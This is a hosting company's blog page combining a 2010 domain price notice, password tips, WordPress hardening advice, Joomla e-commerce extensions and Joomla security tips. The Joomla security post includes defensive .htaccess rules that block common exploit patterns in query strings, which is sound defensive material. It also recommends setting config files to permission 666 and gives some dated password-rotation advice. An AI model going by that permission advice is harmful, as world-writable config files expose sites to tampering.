Laws Hosting's Blog

To accommodate the Registry price hike that was announced last year, will be increasing our prices for .COM and .NET Domains from the 30th of June, 2010 at 14:30.

The new prices for .COM and .NET will be £7.00

Important:

• These prices will be applicable from the 30th of June, 2010 at 14:30;
  
• The prices mentioned will be applicable on .COM and .NET Domains only. The prices for .BIZ, .INFO, .ORG and .NAME Domains will not be modified;
• These prices are applicable to all years of Registration, Renewal and Transfer-in.

One of the problems we see with passwords is that users forget them. In an effort to not forget them, they use simple things like their dog’s name, their son’s first name and birthdate, the name of the current month- anything that will give them a clue to remember what their password is – this is very very dangerous.

For the curious hacker who has somehow gained access to your computer system this is the equivalent of locking your door and leaving the key under the doormat. Without even resorting to any specialised tools a hacker can discover your basic personal information – name, children’s name, birthdate, pet names, etc. and try all of those out as potential passwords.

To create a secure password that is easy for you to remember, follow these simple steps:

1. Do not use personal information. You should never use personal information as a part of your password. It is very easy for someone to guess things like your last name, pet’s name, child’s birth date and other similar details.
2. Do not use real words. There are tools available to help attackers guess your password. With today’s computing power, it doesn’t take long to try every word in the dictionary and find your password, so it is best if you do not use real words for your password.
3. Mix different character types. You can make a password much more secure by mixing different types of characters. Use some uppercase letters along with lowercase letters, numbers and even special characters such as ‘&’ or ‘%’.
4. Use a passphrase. Rather than trying to remember a password created using various character types which is also not a word from the dictionary, you can use a passphrase. Think up a sentence or a line from a song or poem that you like and create a password using the first letter from each word.For example, rather than just having a password like ‘yr$1Hes’, you could take a sentence such as “I like to read about security” and convert it to a password like ‘!l2rAs”. By substituting the number ’2′ for the word ‘to’ and using an exclamation point in place of the ‘I’, you can use a variety of character types and create a secure password that is hard to crack, but much easier for you to remember.
5. Use a password management tool. Another way to store and remember passwords securely is to use some sort of password management tool. These tools maintain a list of usernames and passwords in encrypted form. Some will even automatically fill in the username and password information on sites and applications.

Using the tips above will help you create passwords that are more secure, but you should still also follow the following tips:

• Use different passwords. You should use a different username & password for each login or application you are trying to protect. That way if one gets compromised the others are still safe. Another approach which is less secure, but provides a fair tradeoff between security and convenience, is to use one username and password for sites and applications that don’t need the extra security, but use unique usernames and more secure passwords on sites such as your bank or credit card companies.
• Change your passwords. You should change your password at least every 30 to 60 days. You should also not re-use a password for at least a year.
• Enforce stronger passwords: Rather than relying on every user of the computer to understand and follow the instructions above, you can configure Microsot Windows password policies so that Windows will not accept passwords that don’t meet the minimum requirements.

Below is a list of the top 5 tips that most WordPress administrators do not do, but should:

1. Don’t use the admin account – The default user account that is created with every installation of WordPress is the admin account. Unfortunately the entire world knows this, including hackers, and can easily launch a dictionary attack on your website to try and guess your password. If a hacker already knows your username that’s half the battle. It’s highly recommended to delete or change the admin account username.

2. Move your wp-config.php file – Did you know since WordPress 2.6 you can move your wp-config.php file outside of your root WordPress directory? Most users don’t know this and the ones that do don’t do it. To do this simply move your wp-config.php file up one directory from your WordPress root. WordPress will automatically look for your config file there if it can’t find it in your root directory.

3. Change the WordPress table prefix – The WordPress table prefix is wp_ by default. You can change this prior to installing WordPress by changing the $table_prefix value in your wp-config.php file, we recommend an unique value such as rtyujikj_. If a hacker is able to exploit your website using SQL Injection, this will make it harder for them to guess your table names and quite possibly keep them from doing SQL Injection at all.

4. Use Secret Keys – This is probably the most followed security tip on the list, but still amazed at how many people don’t do this. A secret key is a hashing salt that is used against your password to make it even stronger. Secret keys are set in your wp-config.php file. Simply visit https://api.wordpress.org/secret-key/1.1 to have a set of randomly generated secret keys created for you. Copy the 4 secret keys to your wp-config.php file and save. You can add/change these keys at any time, the only thing that will happen is all current WordPress cookies will be invalidated and your users will have to log in again.

5. htaccess lockdown – This is actually my favorite tip from my presentation. Using a .htaccess file you can lockdown your wp-admin directory by IP address. This means only IP addresses you specify can access your admin dashboard URLs. This makes it impossible for anyone else to try and hack your WordPress backend. To do this simply create a file called .htaccess and add the following code to your file, replacing xxx.xxx.xxx.xxx with your IP address:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
order deny,allow
deny from all
#IP address to Whitelist
allow from xxx.xxx.xxx.xxx

You can add more “allow from” lines so make sure to add any IP addresses you plan on accessing your site from (ie Home, Work, etc). Remember most ISP use dynamic IPs, so your IP address may change on reconnecting to your ISP. If you get locked out just update your .htaccess file or delete it all together. This obviously is not a good tip if you allow open registrations as you need to allow your users access to wp-admin.

So, how many of these tips do you follow regularly?

Joomla is one of the most commonly used content managements systems (CMS). One of the main reasons why this script is so widely used is because of its ability to create web sites and online applications with greatly varied functionality. Virtually any type of site with any purpose can be developed with Joomla. There are many extensions that can be added that make the possibilities with this software unlimited.

Whatever your site’s needs may be, it is likely that the time will come when you are ready to monetise your Joomla site. This may seem daunting to you, but not to worry. There are many helpful extensions that will help you accomplish your goals.

1. VirtueMart

This is a free shopping cart component for Joomla. It is fully featured which makes it easy to sell your products online. It comes complete with user management, administration features, payment modules, tax modules, shipping address management, order confirmation emails, product availability, categories and many other features. This components functionality can even be extended with other Joomla components and extensions.

2. JcontentSubscription

This another fantastic Joomla component created for subscription based web sites. If you are selling an informational product, this is the component for you. You can create subscriptions for individual users, any category or article, and for any section of any other component in use! That includes forums, web links, image galleries, bookmarks and files. It also comes with the ability to create different subscription types with different price structures. This component is also free!

3. eBay Flash Seller

This is an auction component that is compatible with Joomla 1.5. It can be used on unlimited domains because it is completely free. If you are an eBay seller you can easily display your auctions from your Joomla web site. This is a handy little component that will allow you to build different modules to show different auction listings on each page.

4. PayPal Sales Button

This is a very simple Joomla plug-in. It is compatible with Joomla 1.5. This nifty button allows you to sell one item or multiple items from any page. No complicated configuring is needed for this easy to use button. You can begin selling right away.

5. Donation Thermometer

This is a Joomla module that will assist with fund raising. It will display a red thermometer that will show a dollar amount increase with each donation given.

If you have chosen to use Joomla for your web site, I am sure you are beginning to fully understand what this software package is capable of. Aside from these E-commerce extensions; there are many different types of add-ons that will ensure that you can accomplish anything with your site.

Joomla! is a great CMS that is used worldwide. For this reason, hackers often try to find a way to hack a Joomla! website. Here are 7 tips to optimise Joomla! security, preventing your Joomla! website getting hacked.

Always remember to make a regular backup of your website & database. If you still get hacked, you can always get back to an older version of your website. Make sure you find out which extension caused the vulnerability and un-install it.

More so, check the Joomla! website, and UPDATE, UPDATE, UPDATE.

Change the default database prefix (jos_)

Most SQL injections that are written to hack a Joomla! website, try to retrieve data from the jos_users table. This way, they can retrieve the username and password from the super administrator of the website. Changing the default prefix into something random, will prevent (most / all) SQL injections.

You can set the database prefix when installing your Joomla! website. If you’ve already installed Joomla! and want to change your prefix, do the following:

1. Log on to your Joomla! back-end.
2. Go to your global configuration and search for the database
3. Change your database prefix (Example: fdasqw_) and press Save.
4. Go to phpMyAdmin to access your database.
5. Go to export, leave all default values and press Start. Exporting the database can take a while.
6. When done, select all code and copy it to notepad (or any other text editor)
7. In phpMyAdmin, select all tables and delete them
8. In notepad, do a Search & replace (Ctrl + H). Set the searchterm to jos_ and change it into your new prefix (Example: fdasqw_). Press “Replace all”.
9. Select everything in your notepad file and copy it. In phpMyAdmin, go to SQL, paste the queries and press Start.

Remove the version number / name of extensions

Most vulnerabilities only occur in a specific release of a specific extension. Showing MyExtension version 2.14 is a really bad thing. You can modify this message to only the name of the extension by doing the following:

1. Retrieve all files of the extension from your server.
2. Open up Dreamweaver.
3. Load any file from the extension that you just downloaded to your local machine.
4. Use the Search function and set the search to Search through specified folder. Navigate to the folder where you downloaded the exploit to.
5. Set the search term to “MyExtension version 2.14” and press OK.
6. When found the correct file, remove the version number.
7. Upload the changed file to your server and check if the changes are made.

Use a SEF component

Most hackers use the Google inurl: command to search for a vulnerable exploit. Use Artio, SH404SEF or another SEF component to re-write your URL’s and prevent hackers from finding the exploits.

Additionally, you’ll get a higher rank in Google when using search engine friendly URL’s.

Keep Joomla! and extensions up to date

This one is pretty obvious. Always check for the latest versions of Joomla! and the extensions you’re using. Many vulnerabilities are resolved most of the times in later versions.

Use the correct CHMOD for each folder and file

Setting files or folders to a CHMOD of 777 or 707 is only necessary when a script needs to write to that file or directory. All other files should have the following configuration:

• PHP files: 644
• Config files: 666
• Other folders: 755

Delete leftover files

When you installed an extension that you didn’t like, don’t set the extension to unbublished. If you do, the vulnerable files will still be on your website. So simply use the un-install function to totally get rid of the extension.

Change your .htaccess file

Add the following lines to your .htaccess file to block out some common exploits.

########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a < script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

For more Joomla! security tips, you can read the following:

• Joomla Administrators Security Checklist
• Visit the Joomla! security forums (1.0 and 1.5)

Keep an eye on websites listing Joomla! vulnerabilities:

• Secunia
• FrSIRT
• Milw0rm

If you have more tips to enhance the security of Joomla!, we would really like to hear from you.